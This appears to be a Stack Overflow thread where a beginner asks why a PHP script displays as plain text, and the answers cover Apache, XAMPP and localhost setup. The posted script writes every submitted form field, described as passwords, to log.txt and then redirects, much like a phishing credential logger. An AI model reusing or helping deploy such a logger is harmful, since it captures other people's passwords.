# Why does it display php as text?

Tags: php, html

i know this question has been asked befor but i really didn't understand anything out of the answers.
i don't know much about php i just wanted to connect my html website into a php file that will save all the password into a text file.
but when i enter a random password and it directs me into the php file its just the source code on the browser.
i obiously have php instaled (on my computer, i still run it on my computer befor i upload it to the server)
this is the php source code:

```
<?php
header ('Location: secret :) ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
```

Comment: Make sure you have PHP installed and check if your filename has the extension .PHP

Comment: Did you also install a web server? There is install packages for most OS'es you can use; http://www.wampserver.com/en/ - http://mamp.info/ for example

Comment: Check that php module or fastcgi is enabled/working properly if you installed web server already

Comment: On an unrelated note, you are redirecting away at the beginning of your script.

Comment: Make sure you are using a `http://` URL instead of `file:///`.

Answer (score 1):

You'll need to add `php` module in your web server's configuration file

If you're using Apache HTTP server on Windows, open httpd.conf and add the following lines

```
# 
LoadModule php5_module "c:/php/php5apache2.dll"
AddHandler application/x-httpd-php .php

# configure the path to php.ini
PHPIniDir "C:/php"
```

Read more [here](http://php.net/manual/en/install.windows.apache2.php) about installing PHP on windows

For Linux, add this line

```
LoadModule php5_module <path_to_php>/libphp5.so
```

Make sure you set correct path to `libphp5.so` file

Comment: i still didn't edit it as a server, only a simple html file i opened as a localhost.

Comment: "didn't edit it as a server" meaning? You haven't configured it to serve `php` files?

Comment: it's not a server YET just a simple html file connected to an external php file.

Comment: You can't just get/post your data to any local php file, it MUST be served by a web server. Only then it will be interpreted correctly.

Answer (score 0):

You sugest you have php installed but it appears it is not set up correctly for your system. Rather than downloading php directly I would advise beginners to use an install package such as xampp. This stands for:
 - (x)Cross compatible 
- (a)pache
- (m)y SQL
- (p)hp
- (p)erl
by including all these in the package or means you can get started quickly with a full server, and can use databases and/or apaches features.

Once your package is installed ensure You are directing to the page correctly.

- firstly files need to be saved in the correct folder; this is usually htdocs or www within your packages folder
- secondly, you need to start the server. For xampp a controll panel is provided for this. For pure php's built in server use the command lune
- type the correct location in the address bar. Rather than typing a fixed computer address you will need to use localhost (or 127.0.0.1). This will load the page with your Local server